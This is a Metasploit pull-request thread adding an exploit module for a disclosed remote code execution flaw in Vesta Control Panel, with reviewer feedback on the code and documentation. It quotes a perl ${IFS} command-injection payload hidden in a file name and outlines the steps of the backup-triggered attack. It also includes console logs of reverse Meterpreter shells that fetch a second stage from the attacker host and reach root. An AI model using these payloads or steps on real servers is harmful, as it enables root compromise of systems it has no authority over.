Adding Vesta Control Panel Remote Code Execution 0day
rapid7/metasploit-framework pull request #13094
Opened 2020-03-18 14:54 UTC by mmetince

Hi all,

It's been a while since I haven't release one of these. 

PS: #13093  must be landed first.
## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/vestacp_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Set `USERNAME`
- [ ] Set `PASSWORD`
- [ ] Set `SRVHOST`
- [ ] Set `SRVPORT`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Successfully authenticated to the FTP service` in console.
- [ ] **Verify** that you are seeing `Successfully uploaded the payload as a file name` in console.
- [ ] **Verify** that you are seeing `Successfully authenticated to the HTTP Service` in console.
- [ ] **Verify** that you are seeing `Scheduled backup has ben started. Exploitation may take up to 5 minutes.` in console.
- [ ] **Verify** that you are seeing `It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...` in console.
- [ ] **Verify** that you are seeing `First stage is executed ! Sending 2nd stage of the payload` in console.
- [ ] **Verify** that you are getting meterpreter session.

Technical details [https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/](https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/)

2020-03-19 14:26 UTC, acammack-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
Command stagers should be able to operate even with these restrictions, were there any issues you noticed?

2020-03-19 17:03 UTC, mmetince commented on modules/exploits/linux/http/vestacp_exec.rb
> +    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
I haven't noticed specific issue but I choose meterpreter payload delivery via web because of following reasons:

- Meterpreter is lovely ❤️ I always go for it if it's possible.

- Raw cmd stagers contains lots of special chars , such as  < > & "  etc etc , which are usually cause a syntax errors during exploitation of these type of vulnerabilities. So I have to must black-listed almost all of them, which means final payload will always be `perl{IFS}-e{IFS}` template no matter what type of cmd stager is being used. 

- Specially when you encode python meterpreter stager into the `perl{IFS}-e{IFS}` template, there is no way to keep it shorter then file name length. So that means even if I support multiple payload platform, I have to use web delivery when python payload selected, which brings more and more if-else states in the module. I'm not even mentioning about supporting linux elf binary stagers, which brings even moreeee if-elses to module and bash codes on the server. At some point, I told my self "Meeeh, that's getting complicated :D why don't we just focus python meterpreter"

2020-04-09 16:51 UTC, ccondon-r7 commented
Hey @mmetince, we're going to take a look at this in a bit, but question for you: Has the vuln been disclosed to the vendor here?

2020-04-10 07:04 UTC, mmetince commented
Hey @ccondon-r7 , vulnerability has been disclosed to the vendor. Fix is merged to the master with following commit [https://github.com/serghey-rodin/vesta/commit/a5712542d7315f45abf6df275744889437393c30](https://github.com/serghey-rodin/vesta/commit/a5712542d7315f45abf6df275744889437393c30) ! I also reported this vulnerability to the different projects that are use vesta-cp as a base project.

2020-04-10 13:31 UTC, ccondon-r7 commented
Awesome, @mmetince, thanks for confirming. You're the best! Nice work :)

2020-04-10 15:30 UTC, wvu-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
Yeah, using a library is ideal, but if the vuln is specific enough on restrictions, it's probably best to do custom encoding instead of working around the library. Fewer regressions may be anticipated in this case.

That said, I would make my best effort to make the library work, and I would modify the library if possible, but that may be more regression-prone. I think what you've done is fine in this case, and the module will continue to work into the future.

2020-04-10 17:33 UTC, wvu-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    # Yet another datastore variable overriding.
This should be fixable in the library soon. I see no reason we can't put the configuration in `opts` and fall back on the datastore option.

2020-04-10 21:10 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +## Scenarios
Can you update this so that instead of having the title Scenarios, you replace it with a title describing the name of the system you tested this against? For example "Ubuntu 18.04 LTS with VestaCP v1.03" would be an example of the format that I am looking for here.

2020-04-10 22:26 UTC, gwillcox-r7 requested changes
There are a few areas in this that still need fixes which I have marked in the review. Rest of it looks like mostly just grammatical and spelling errors which I will fix after you've fixed up these issues.

2020-04-10 22:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
Change this to Failure::NoAccess. Its a bit of an odd case as technically we could also fail to connect but I think this is the best option as its in line with the error message we are printing out here and it will also cover the case where we are able to connect but for whatever reason the authentication fails.

2020-04-10 22:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    print_good('Successfully uploaded the payload as a file name')
Can you add a comment or otherwise improve this output line a bit? Its a little confusing as to what is going on here.

2020-04-10 22:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +      Rex.sleep(30)
Can just change this to `sleep(30)`, no need for the Rex part.

2020-04-10 22:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    # We need that global variable since get_uri keep using SSL from datastore
Can you correct this comment? If this comment is referencing `second_stage_url` then technically this is an instance variable, not a global variable. If it was `$second_stage_url` it would be a global variable. See https://www.sitepoint.com/understanding-scope-in-ruby/ for more information. 

With that said the way you are doing it now is fine as if you were to run multiple instances of this module concurrently the variable would still be local to each instance of the module, and wouldn't be leaking across instances.

2020-04-10 22:28 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    # We need that global variable since get_uri keep using SSL from datastore
@mmetince Feel free to mark this one as resolved yourself, this was more just for your reference when writing modules going forwards; thought it might clarify some things up :)

2020-04-10 23:20 UTC, wvu-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    print_good('Successfully uploaded the payload as a file name')
The finest filename.

2020-04-11 05:37 UTC, gwillcox-r7 commented
Also @mmetince tried your exploit but had problems replicating it. Does seem to be connecting back but the shell isn't exactly reliable? This was using the install instructions at http://vestacp.com/install/ on Ubuntu 18.03 LTS. Seems the exploit does work though, but had to run it twice and then got a root shell instantly; guess the listener was timing out.

```
msf5 > use exploit/linux/http/vestacp_exec 
msf5 exploit(linux/http/vestacp_exec) > set RHOST 172.16.139.129
RHOST => 172.16.139.129
msf5 exploit(linux/http/vestacp_exec) > set LHOST 172.16.139.1
LHOST => 172.16.139.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 172.16.139.1
SRVHOST => 172.16.139.1
msf5 exploit(linux/http/vestacp_exec) > set USERNAME tester
USERNAME => tester
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD testing
PASSWORD => testing
msf5 exploit(linux/http/vestacp_exec) > show options

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   testing          yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.139.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    172.16.139.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   tester           yes       The username to login as
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.139.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/vestacp_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf5 exploit(linux/http/vestacp_exec) > [*] Started reverse TCP handler on 172.16.139.1:4444 
[*] 172.16.139.129:8083 - Using URL: http://172.16.139.1:8080/5EgtLfy5uO17X
[*] 172.16.139.129:8083 - Second payload download URI is http://172.16.139.1:8080/5EgtLfy5uO17X
[+] 172.16.139.129:21 - Successfully authenticated to the FTP service
[+] 172.16.139.129:21 - Successfully uploaded the payload as a file name
[*] 172.16.139.129:8083 - Retrieving cookie and csrf token values
[+] 172.16.139.129:8083 - Cookie and CSRF token values successfully retrieved
[*] 172.16.139.129:8083 - Authenticating to HTTP Service with given credentials
[+] 172.16.139.129:8083 - Successfully authenticated to the HTTP Service
[+] 172.16.139.129:8083 - Scheduled backup has ben started. Exploitation may take up to 5 minutes.
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 172.16.139.129:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 172.16.139.129
[*] Meterpreter session 1 opened (172.16.139.1:4444 -> 172.16.139.129:57612) at 2020-04-11 00:10:17 -0500
[-] 172.16.139.129:8083 - Exploit aborted due to failure: unknown: Something went wrong. Maybe session timed out ?
[*] 172.16.139.129:8083 - Server stopped.

msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > shell
[-] Unknown command: shell.
meterpreter > guid
[+] Session GUID: 00000000-0000-0000-0000-000000000000
meterpreter > 
[*] 172.16.139.129 - Meterpreter session 1 closed.  Reason: Died

msf5 exploit(linux/http/vestacp_exec) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.139.1:4444 
msf5 exploit(linux/http/vestacp_exec) > [*] 172.16.139.129:8083 - Using URL: http://172.16.139.1:8080/k9CjxSf3qjf
[*] 172.16.139.129:8083 - Second payload download URI is http://172.16.139.1:8080/k9CjxSf3qjf
[+] 172.16.139.129:21 - Successfully authenticated to the FTP service
[+] 172.16.139.129:21 - Successfully uploaded the payload as a file name
[*] 172.16.139.129:8083 - Retrieving cookie and csrf token values
[+] 172.16.139.129:8083 - Cookie and CSRF token values successfully retrieved
[*] 172.16.139.129:8083 - Authenticating to HTTP Service with given credentials
[+] 172.16.139.129:8083 - Successfully authenticated to the HTTP Service
[+] 172.16.139.129:8083 - Scheduled backup has ben started. Exploitation may take up to 5 minutes.
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] Sending stage (53755 bytes) to 172.16.139.129
[*] Meterpreter session 2 opened (172.16.139.1:4444 -> 172.16.139.129:57652) at 2020-04-11 00:21:42 -0500

msf5 exploit(linux/http/vestacp_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter > shell
Process 63749 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
```

And then I did one more test after killing all jobs to double check:

```
msf5 exploit(linux/http/vestacp_exec) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.139.1:4444 
msf5 exploit(linux/http/vestacp_exec) > [*] 172.16.139.129:8083 - Using URL: http://172.16.139.1:8080/wW7t9zd6
[*] 172.16.139.129:8083 - Second payload download URI is http://172.16.139.1:8080/wW7t9zd6
[+] 172.16.139.129:21 - Successfully authenticated to the FTP service
[+] 172.16.139.129:21 - Successfully uploaded the payload as a file name
[*] 172.16.139.129:8083 - Retrieving cookie and csrf token values
[+] 172.16.139.129:8083 - Cookie and CSRF token values successfully retrieved
[*] 172.16.139.129:8083 - Authenticating to HTTP Service with given credentials
[+] 172.16.139.129:8083 - Successfully authenticated to the HTTP Service
[+] 172.16.139.129:8083 - Scheduled backup has ben started. Exploitation may take up to 5 minutes.
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 172.16.139.129:8083 - It seems there is an active backup process ! Recheck after 3 [...]

2020-04-11 08:40 UTC, mmetince commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +(reverse-i-search)`': set Interrupt: use the 'exit' command to quit
Opss 👀

2020-04-11 08:44 UTC, mmetince commented on modules/exploits/linux/http/vestacp_exec.rb
> +        During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
Yep it should be "v-backup-user". My mistake 👀 !

2020-04-11 11:36 UTC, mmetince commented
@gwillcox-r7 Thank you very much for your comprehensive review ! 🤘🏻

`Seems the exploit does work though, but had to run it twice and then got a root shell instantly`

The reason why you've got the instant root shell on your second **run** is all about nature of the vulnerability.

One of the most important thing about this exploit module is that, we are injection our payload into the `cat /usr/local/vesta/data/users/[USERNAME]/backup.conf` file by using v-backup-user. That files contains all the information about backup of the user. When the backup is done, we are triggering the payload. 

So the logic is like a follow.

1 - Put an empty file into the user home folder with a malicious file name. 
2 - Trigger the backup, which will manipulate the backup.conf !
3 - Visit the backup list URL, if you are seeing `An existing backup is already running.` that means backup is still in progress. We must wait until it's done.
4 - Visit the backup list URL again and agin. If the backup is done, that means we are not seeing `An existing backup is already running.`, which means we triggered the payload !

When you second run the module, it triggers another backup process. In that case, backup.conf file content already contains a payload from the first attempt ! On your first attempt to check status of the backup via backup list URL, you are triggering payload that is already placed on the first attempt :)

2020-04-11 11:57 UTC, mmetince commented
Here is the output of final version.
```
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.74.1:4444 
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started ! 
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300

msf5 exploit(linux/http/vestacp_exec) > sessions -i 8 
[*] Starting interaction with 8...

meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3

# 
```

2020-04-11 18:12 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +You can install Vesta Control Panel on Linux server with following commands.
This and the title above it should really be a bit more specific to what operating systems it supports. If your installing on Ubuntu 18.03 LTS for example, the tile should reflect this, and state something like "Installing the Vulnerable Application on Ubuntu 18.03 LTS". Its possible that things may break in the future so having accurate logs of what you tested is helpful for these scenarios :)

Also stating "Linux server" here is way to vauge in my opinion given that Linux has many flavors. Update this to be the server you installed it on and its version, so say "Ubuntu 18.04 LTS".

2020-04-11 18:43 UTC, gwillcox-r7 requested changes
@mmetince Looking a lot better, still some areas to fix up. Sorry for earlier deleted comment, I made a comment initially and then deleted it and moved it into this full review instead. Main issues were the lack of a `check` command at the moment and the fact that you didn't update the listings within the documentation. Rest of it is mostly edits for additional clarity in certain areas.

Let me know if you have any questions or concerns!

2020-04-11 18:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +## Vulnerable Application Installation Steps
This and the title above it should really be a bit more specific to what operating systems it supports. If your installing on Ubuntu 18.03 LTS for example, the tile should reflect this, and state something like "Installing the Vulnerable Application on Ubuntu 18.03 LTS". Its possible that things may break in the future so having accurate logs of what you tested is helpful for these scenarios :)

Also stating "Linux server" here is way to vauge in my opinion given that Linux has many flavors. Update this to be the server you installed it on and its version, so say "Ubuntu 18.04 LTS".

2020-04-11 18:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
This is too vauge. If I don't have the software in front of me or if I don't know the control panel that well, I might struggle to add a new unprivileged user. Testing this out myself I found it wasn't hard to do but I would still add the steps in as the extra clarity is always appreciated when reviewing these documents down the line, and its a good habit to get into.

2020-04-11 18:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +## Ubuntu 18.04 LTS with VestaCP 0.9.26
Thanks for updating this, looking good!

2020-04-11 18:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +[-] 192.168.74.218:8083 - Exploit aborted due to failure: unknown: Something went wrong. Maybe session timed out ?
Hmm seems like you updated the exploit but you didn't update the documentation. Can you update the listing in this documentation to reflect your changes? Think in the comment you showed that this line wasn't appearing any more so the documentation should reflect this :)

2020-04-11 18:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +```
Any way we can maybe add in that output of dropping into the shell and running `id` just for reference? If you don't want to do that this is fine, just thought it might help readers confirm that you are in fact running as the `root` user.

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +        During the user backup process, this file name will be evaluated by the v-backup-user bash scripts. As
Can we change this from `scripts` to `script`?  As far as I am aware there is only one `v-backup-user` script on the system, but feel free to correct me if I am wrong. Thanks for renaming this though, much appreciated!

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +          'Payload' => 'python/meterpreter/reverse_tcp'
Thanks for updating this section, looks good now 👍

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    # by using trigger_payload method. In order to do it, backup process must be finished !
Should add something like "by browsing to the /list/backup endpoint" just to make it clear that this is a web service. Otherwise this is a lot better than the previous explanation, well done!

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Something went wrong.')
I'm a bit debated on this instance here, as technically speaking you could fail for the case where `res` is Nil, in which case you should be throwing `Failure::Unreachable`,  or if `res.code` is 200 or `res.get_cookies_empty` is True, then you should be raising a `Failure::UnexpectedReply` error. In both cases I don't think throwing `Failure::Unknown` is ideal here as in both cases the errors are expected possible outcomes.

I would recommend breaking this down into one check for `res` to see if it is not `nil` and then throwing `Failure::Unreachable` if so, and then keeping the other two checks in the current statement you have here.

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +            fail_with(Failure::UnexpectedReply, 'Something went wrong.')
Thanks for fixing this, this looks much neater now!

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +        fail_with(Failure::UnexpectedReply, 'Something went wrong...')
This is a general comment, but would we be able to update all of these "Something went wrong..." comments so they are each unique? Otherwise if I get an error, its much harder to trace it back to where it occurred as you have several instances which are all throwing the same error type with the same error message.

2020-04-11 18:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +  def exploit
You have an `exploit` method, however I don't see any `check` method here. Would you please add in a `check` method to the exploit that will allow users to simply check if the target is vulnerable without exploiting it? Seeing as this is an authenticated bug, this could be as simple as logging in and checking the banner somewhere to determine the version. Let me know if you have any questions on this :)

2020-04-11 19:32 UTC, wvu-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Something went wrong.')
Don't listen to me.

```suggestion
      fail_with(Failure::Unknown, 'Something went wrong on the Internet.')
```

2020-04-11 21:47 UTC, gwillcox-r7 commented
Also @mmetince I didn't mention this before but given that this module alters a config file, I would like to ensure that there is additional documentation that reflects this.

Can we add the following in (ratings taken from https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability )

```
      'Notes'          =>
        {
          'Stability'   => [ CRASH_SAFE, ],
          'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ],
        },
```

The reason for me adding IOC_IN_LOGS is cause if I open up `/usr/local/vesta/log/backup.log' there are clear copies of the commands you are executing in the logs which could indicate potential compromise.

<img width="1103" alt="Screen Shot 2020-04-11 at 4 43 44 PM" src="https://user-images.githubusercontent.com/63261883/79055568-a0125400-7c13-11ea-8478-b8e63f7e5fe1.png">

For a good reference of where these should be placed, see https://github.com/rapid7/metasploit-framework/blob/5698f6e51fa8227321d3afe4666fd5a9073ce793/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb#L49

On a similar note I'd also be interested if there is any way your exploit could clean up after itself as right now it seems that once one runs the exploit, every subsequent backup attempt will try connect back to the attacker's machine. This might be great for persistence but if someone is in a pentest, this will be an absolute nightmare as most likely someone will have to go back through the log file and clean out their entires by hand, which could take a long time if the log file is particularly large.

2020-04-11 22:49 UTC, wvu-r7 commented
Haven't looked much at this module, but `ARTIFACTS_ON_DISK` might also be warranted.

2020-04-13 07:40 UTC, mmetince commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
I see what is your point in here. I already thought about that too😅, if you visit `https://192.168.74.218:8083/add/user/` page, it will redirect you to the login page. When you submit credentials, you will be automatically redirected back to `https://192.168.74.218:8083/add/user/`. It must be quite easy IMHO.

2020-04-13 07:42 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
If you didn't know the app, it could take longer than seconds. :-)

2020-04-13 07:43 UTC, mmetince commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +[-] 192.168.74.218:8083 - Exploit aborted due to failure: unknown: Something went wrong. Maybe session timed out ?
Upss 😇

2020-04-13 08:05 UTC, mmetince commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Something went wrong.')
Checking `res` before taking any action on response object makes sense, but it kind awkward doing `if res` check after every single `send_request_cgi` usage. I'm doing that changes on login method as you recommend, but I think it's something must be done with different approach.

Maybe we can add something like `send_request_cgi_validate(ops, code, fail_with_code, fail_with_err_msg)` function to the HttpClient lib so that we can get ride of that 'if statement' every single time ??

```
  def send_request_cgi_validate(opts={}, code = 200, fail_with_code, fail_with_err_msg)
    res = send_request_cgi(opts)
    if not res
       fail_with(Failure::Unreachable, 'Target is unreachable.')
    end
    if res.code != code
       fail_with(fail_with_code, fail_with_err_msg)
    end
    res
  end
```

@wvu-r7 Dude, LOL

2020-04-13 08:11 UTC, mmetince commented on modules/exploits/linux/http/vestacp_exec.rb
> +        fail_with(Failure::UnexpectedReply, 'Something went wrong...')
You are right :)

2020-04-13 08:16 UTC, mmetince commented on modules/exploits/linux/http/vestacp_exec.rb
> +  def exploit
I tried to do it. But I haven't seen any useful information to use for detection. Of course we can use`login` in `check` method and validate the credentials but I thinks it's not possible to say it's `vulnerable`, `safe`, or `appear`. Let me know if you have seen any useful info on web app.

2020-04-13 08:25 UTC, mmetince commented
@gwillcox-r7 It has been a while since I haven't got that kind of detailed review of my PRs on msf project ! Thank you very much. Much appreciated 🤘🏻

Let me know if you wanna see additional improvements and changes.

2020-04-13 08:26 UTC, bcoles commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Something went wrong.')
```ruby
      unless res
        fail_with(Failure::Unreachable, 'Target is unreachable.')
      end

      unless res.code == 200
        fail_with(Failure::UnexpectedReply, 'Web server error! Expected HTTP response code is 200.')
      end

      if res.get_cookies.empty?
        fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
      end

      @cookie = res.get_cookies
      @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''

      if @csrf_token.empty?
        fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
      end
```

2020-04-13 13:25 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
This wasn't what I was mentioning. My specific issue was with you stating that you should just add a new unprivileged user. You state this without explaining the steps of how to add a new unprivileged user. From what you are current saying, you are assuming the user knows how to add an unprivileged user but I want to see the specific steps for how you add an unprivileged user to the system, listed out in step by step instructions.

2020-04-13 13:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +## Vulnerable Application Installation Steps
Confirmed fixed, good job :)

2020-04-13 13:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +[-] 192.168.74.218:8083 - Exploit aborted due to failure: unknown: Something went wrong. Maybe session timed out ?
Confirmed fixed, looks like a nice clean copy of the documentation now!

2020-04-13 13:38 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +```
Hmm looks like you typed in two shell entries here, but otherwise fine. Confirmed fixed :)

2020-04-13 13:39 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +          'Payload' => 'python/meterpreter/reverse_tcp'
Marking as resolved as this was just a comment.

2020-04-13 13:40 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +    # by using trigger_payload method. In order to do it, backup process must be finished !
Confirmed fixed, sentence is now much easier to read :)

2020-04-13 13:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +      fail_with(Failure::Unknown, 'Something went wrong.')
@mmetince Can you please update your code with the code that @bcoles has provided? I reviewed your code but it doesn't not provide appropriate error messages for all the various scenarios. @bcoles's solution will ensure that both the error code being provided as well as the error message being provided are appropriate for the given error that is being encountered.

2020-04-13 13:47 UTC, gwillcox-r7 commented
Confirmed that the Notes section has been updated correctly. This was not part of the review comments so I can't mark it as completed, but it looks good now 👍

2020-04-13 14:28 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +  def exploit
So seems like one could grab the version by browsing to `/list/updates/` as `admin`, which shows the installed software an its versions. Unfortunately this page is not visible to normal users :/ Will try see if I can't find another page which might allow version enumeration.

2020-04-13 15:10 UTC, gwillcox-r7 commented on modules/exploits/linux/http/vestacp_exec.rb
> +        fail_with(Failure::UnexpectedReply, 'Something went wrong...')
Confirmed fixed, and new error messages look a lot better, great work!

2020-04-13 16:01 UTC, mmetince commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
```
1- Go to https://IP_ADDR:8083/

2- Login with your administrator account.

3- Click on a "User" section under the top navigation menu. When you move your mouse over the "User" text,it will be 
turned to orange colour. That's link you need to click!

4 - Now you must be on https://IP_ADDR:8083/list/user/ page.

5 - Click on a green plus sign on the left side. When you move your mouse on it, it will say "ADD USER".

6 - Now you are seeing a user creation form. "user, password, email, first name, last name" fields are required.
Leave package and language options as is. It does not affect on exploitation.

7 - Log out from your admin account.

8 - Go back to URL on the first step. 

9 - Try to login with unprivileged user.
```

Do you guys wanna add additional steps ? Please add it before landing PR, if so.

2020-04-13 16:04 UTC, mmetince commented
Thank @gwillcox-r7. Let me know if I missed any of your comments that I need to fix.

2020-04-13 16:12 UTC, gwillcox-r7 commented
@mmetince New changes look good!

2020-04-13 16:24 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/vestacp_exec.md
> +Once you have finished the installation, go to https://IP_ADDR:8083/add/user/ and new unprivileged user with default package.
